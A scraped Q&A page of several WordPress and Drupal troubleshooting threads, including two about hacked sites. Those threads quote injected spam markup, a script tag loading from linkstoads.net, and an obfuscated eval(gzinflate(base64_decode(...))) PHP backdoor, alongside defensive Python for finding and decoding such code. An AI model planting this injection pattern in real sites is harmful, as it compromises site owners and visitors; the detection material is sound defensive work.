How to locate the malicious code in my Wordpress site - wordpress

It only came to my attention today that there is a malicious link that was injected in my WordPress site.
The link is only on the homepage of orphicpixel.com, and here is the full code in HTML:
<div class="toggle-search"><div id="5221f63">Learn how to extend your penis size using vigrx reviews.</div><script type="text/javascript">document.getElementById("36f1225".split("").reverse().join("")).style.display
= "none"</script><i class="fa fa-search"></i></div>
These are the fixes that I tried.
Change the theme to default - the code is still there.
Turn off all the plugins - the code is gone.
I have identified 5 plugins that when turned on, the code appears. But the plugins are the official plugins like Jetpack, WP-pagination etc.
I already searched my database but I got nothing.
I downloaded the theme files and searched the code, nothing.
I downloaded all the plugin files and searched the code, nothing.
So my last resort is to post this question here.

Unfortunately it is likely hidden in something like an eval statement, which can be hidden in hex. WordPress can be useful, but the plugins are what make it a security nightmare. It is likely that some plugin has allowed some kind of upload access to your site and they can run their own PHP script or anything really.
Look through your files using:
find . -type f -mtime -1
The -1 is days back; you can try -2, -3, etc. If this is a recent problem, hopefully this will show a recently modified file. It will look a lot like gibberish when you open a file that is bad.
Again unfortunately, if they are smart they will adjust the time on the file to be something a few weeks back or whatever, thus making the file much harder to find.
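The answer above points at eval statements and hex-encoded strings, and warns that modification times can be rewritten. The following is an added example, not part of the original answer: it scans PHP files by content instead of by mtime and also flags files whose inode change time is much newer than their mtime. The indicator list, the file names and the sample contents are constructed for illustration.

```python
import os
import re
import tempfile
import time

# Heuristic indicators of obfuscated PHP (an assumed, non-exhaustive list).
INDICATORS = {
    "eval-of-decoder": re.compile(
        rb"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I),
    "hex-escaped-string": re.compile(rb"(?:\\x[0-9a-fA-F]{2}){8,}"),
    "long-base64-literal": re.compile(rb"[\"'][A-Za-z0-9+/=]{120,}[\"']"),
}
DAY = 86400

def inspect_file(path, slack=DAY):
    """Return (indicator names, backdated) for one file."""
    # backdated: st_ctime (inode change time on Unix) is > slack seconds newer than mtime.
    with open(path, "rb") as fh:
        data = fh.read()
    st = os.stat(path)
    found = sorted(n for n, rx in INDICATORS.items() if rx.search(data))
    return found, (st.st_ctime - st.st_mtime) > slack

def scan_tree(root):
    """Map relative path -> (indicators, backdated) for flagged .php files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                found, backdated = inspect_file(path)
                if found or backdated:
                    report[os.path.relpath(path, root)] = (found, backdated)
    return report

def demo():
    """Scan a constructed tree: one clean file, one obfuscated and backdated."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "clean.php"), "w") as fh:
            fh.write("<?php echo 'hello'; ?>\n")
        bad = os.path.join(root, "cache.php")
        with open(bad, "w") as fh:
            fh.write('<?php $f = "' + "\\x65\\x76\\x61\\x6c" * 3 + '"; '
                     'eval(base64_decode("ZWNobyAxOw==")); ?>\n')
        old = time.time() - 30 * DAY
        os.utime(bad, (old, old))  # backdate mtime, as the answer warns
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

The change time also moves on chmod, chown or a restore that preserves mtimes, so treat the backdated flag as a lead to review, not a verdict.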

Did you purchase your WordPress theme yourself and from the original provider? I would download Theme Authenticity Checker and run the plugin -- it finds malicious code within the theme. I know you checked the theme files, but better be safe than sorry. Usually, purchased themes have no problem but downloaded ones often have malicious code such as this.

Related

Prevent Search Engines from Indexing WordPress Blog

That might seem like an easy question, but I've been struggling with this problem since Monday.
There's a wordpress website that I need to be hidden when searching for the keywords contained in it, but I can't work it out.
I already tried to:
Add a robots.txt, on the main root, on the httdocs folder, and on the folder containing the website.
Use the in-built function of wordpress.
Protect the website with a password
None of them seems to be working, so I deleted the website (that was a staging website btw) but it keeps being indexed on search engines.
What shall I do?
Robots.txt is the solution. However, you need to realize it can take weeks for Google to remove the site from the index.
For other options see the "Make removal permanent" part - https://support.google.com/webmasters/answer/1663419?hl=en

Wordpress uses backed-up theme files instead of customized file. (solved by myself // little how-to)

I just wrote a long and detailed question and when I was about to submit it, I fixed the problem by myself. The problem did cost me about 5 hours and now I will just post this little explanation, so maybe it helps others and they will not feel as stupid as I do right now.
In my defense: I do not have that much experience with this system.
What was the Problem? When did it show up?
Before I change a file on the server, I always duplicate it and change the file name to originalFileName_yyyymmdd_hhmm.php (filename + date + time). I want to keep track of the changes, and when we launch the website, I wanted to do a local backup and then delete them from the server.
Let's say, in the folder of the active theme there is a file called home.php.
It is a template file, which means that you can select it as a template for a page when editing it in the backend of WordPress.
I duplicated it and called the new file home_20180301_2300.php.
Then I edited the home.php, but the changes were not displayed on the website.
I checked for any known cache issue, but that was not the problem. So I installed a debugging plugin (Template Debugger) to see which files are used by the server to create the website.
WordPress used the home_20180301_2300.php instead of the home.php and I did not know why. When I deleted home_20180301_2300.php, WordPress did NOT use home.php. It just took the standard template instead.
What I think happened
In the last moment before submitting this question I realized what happened:
In the process of working, there was a situation where I deleted the home.php and then edited the page in the backend. WordPress could not find the home.php, which was set as the template for this page. BUT it found home_20180301_2300.php and used it. (Because WordPress is smart [sometimes {not a joke}]). When home.php was back in its place, WordPress did not care. It looks like as long as there is no problem, WordPress does not search for other (or newer, or better suiting) files. It still used home_20180301_2300.php, because it worked. That's why my changes in home.php did not have any effect. home.php was ignored.
The Solution
I had to delete home_20180301_2300.php, open the page in edit mode and select home.php as the template again. WordPress did not find home_20180301_2300.php, "BUT HEY! There is home.php, my old friend, so I can use it", WordPress said and they happily lived together for the rest of their time.
Feel free to comment!
I am sure my explanation is quite simple and not showing the whole picture. If anyone knows better, I would be glad to hear it. Better knowledge of the problem and the way WordPress works can help me and others to better understand future issues.
Peace out,
Nils

WordPress' Tribe Events leads to main page

My client is using Tribe Events for, well, managing his events :) I was asked to make a new theme for him. I downloaded his old installation and created new theme, checked and everything was great. I uploaded the whole thing to my server - works as well. But when I finally got the thing on my client's host, every link leading to Tribe Events' content is leading back to main page. Strange thing - it happens only when my theme is on. But then again, I tried removing tribe-events directory from the theme, renaming it etc. Nothing helps. Any ideas?
You didn't provide details about the way you use it, so I am not sure how to provide an exact reply.
If you use it without the default page template (the plugin one) then you should check your loop.
Did you override any files or did you change plugin files at all?
Make sure there is no extra loop running, and if you use loops on the page make sure you finish them properly.
And finally - try to reset permalinks, both theme and plugin, if any.

A link to linkstoads.net in my WordPress blog, probably a virus. How do I get rid of it?

Recently (last 2 weeks) this line of code appeared in the footer of a WordPress blog:
<script type="text/javascript" src="http://linkstoads.net/keller/link.php?id=3" name="linkstats"></script>
I did not put that there. I have no idea what it does, but I want it out.
For my first try, I just replaced the template and it was gone for a few minutes. But it came back.
So I went to my index.php file (not the template, the very first index.php) and found this code:
#c3284d#
eval(gzinflate(base64_decode("JcxLDoMwDEXROVL3EHkBeMCsfLqRTKxgKYE0WLFVtbsvkOnRe5dDPBxMGmoSc/YTnj0Yfw03+lBjD05rOD2ayRMxp7KrHbRqX9hw55y53tpLlFda5+G8FHpfrTYmUw/LhC24wPjo/g==")));
#/c3284d#
So I removed it, but it came back again the next day.
How is that possible? I'm a newbie about viruses and security, so the answer may be really basic.
Congratulations! You have been hacked! Most likely you haven't updated your software in quite some time and multiple hackers have exploited some well known vulnerability in your software.
How do you fix it? Scorched earth... You have been hacked by many bots, and probably sold online like some kind of whore. Delete your entire web root and start from scratch. Make sure you have the latest versions of every plugin and Wordpress.
For the record, WordPress was written by monkeys or children or children monkeys... Regardless, it is by far one of the worst applications I have ever hacked. They are probably still using your password hash as the session id, which means they don't even understand the basics of why you should hash passwords.
Oh, if you keep getting hacked, hire a professional.
Problem solved, WordPress is not responsible for it.
There's a trojan that infects FileZilla, and when you open it, it'll inject code in every page it can reach via FileZilla.
This is really a big deal, and 3 antiviruses could not even find it.
If you see that, format your computer.
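The injected index.php block in the question above sits between marker comments and is wrapped as eval(gzinflate(base64_decode(...))). The following is an added example, not part of the original posts: it locates such marker-delimited regions and unwraps the layers statically, so the injected PHP can be read without being executed. The marker a1b2c3 and the sample payload are constructed; the blob from the question is not reproduced.

```python
import base64
import re
import zlib

# Injected region delimited by marker comments, e.g. #c3284d# ... #/c3284d#
MARKED = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.S)
# One obfuscation layer: eval(gzinflate(base64_decode("...")));
LAYER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    r"[\"']([A-Za-z0-9+/=]+)[\"']\s*\)\s*\)\s*\)\s*;?")

def unwrap(php, max_layers=10):
    """Decode nested eval(gzinflate(base64_decode())) layers; nothing is executed."""
    for _ in range(max_layers):
        m = LAYER.search(php)
        if not m:
            break
        try:
            raw = base64.b64decode(m.group(1))
            # PHP gzinflate() reads raw DEFLATE data, hence wbits=-15.
            php = zlib.decompress(raw, -15).decode("utf-8", "replace")
        except (ValueError, zlib.error):
            break  # not a valid layer; return what was decoded so far
    return php

def injected_blocks(source):
    """Return [(marker, decoded text)] for each marker-delimited region."""
    return [(m.group(1), unwrap(m.group(2)).strip())
            for m in MARKED.finditer(source)]

def wrap(php):
    """Build one constructed sample layer (used only to make demo input)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(c.compress(php.encode()) + c.flush()).decode()
    return 'eval(gzinflate(base64_decode("%s")));' % blob

def demo():
    inner = 'echo "<!-- constructed sample, not the payload from the page -->";'
    sample = ("<?php\n#a1b2c3#\n" + wrap(wrap(inner)) +
              "\n#/a1b2c3#\nrequire 'wp-blog-header.php';\n")
    return injected_blocks(sample)

if __name__ == "__main__":
    for marker, text in demo():
        print(marker, "->", text)
```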

Drupal 7 Comment Not Posting

I'm having a heck of a time trying to get comments to post to my nodes. I've done all the obvious:
Enable comment module,
set appropriate permissions,
etc.
But every time I try to enter a comment it simply redirects to a "Add new comment" page and nothing gets posted. There is no comment in the Content -> Comments section and my database comment table is empty.
The only thing I can find relating to the issue is an error report in my log messages which displays a warning "page not found." I'm using the Drupal Busy theme.
Type: Page not found
Location: http://mysite/public://color/busy-0970ccd8/style.css?m
Message: public://color/busy-0970ccd8/style.css
Severity: Warning
I've run the schema module and nothing is funky with my database. Any thoughts on this? Much appreciated.
It's looking for a stylesheet from the Color module. It would normally be at sites/default/files/color/busy-0970ccd8/style.css
Do you have a sites/default/files directory? Check that you have one and that the directory is writable. Also check to be sure that the color module is enabled. Save your theme settings and clear your cache in configuration -- performance.
I'm not sure if a problem retrieving a style sheet from the color module could be causing this. Seems very unlikely.
You might consider not using the busy theme. Its current status is "minimally maintained" and the theme authors have left a note on the project page that there will be no further development at this time.
I recommend looking for a theme that is actively maintained and has good support. It looks like Busy is a pretty standard 960 grid, you might like Omega.
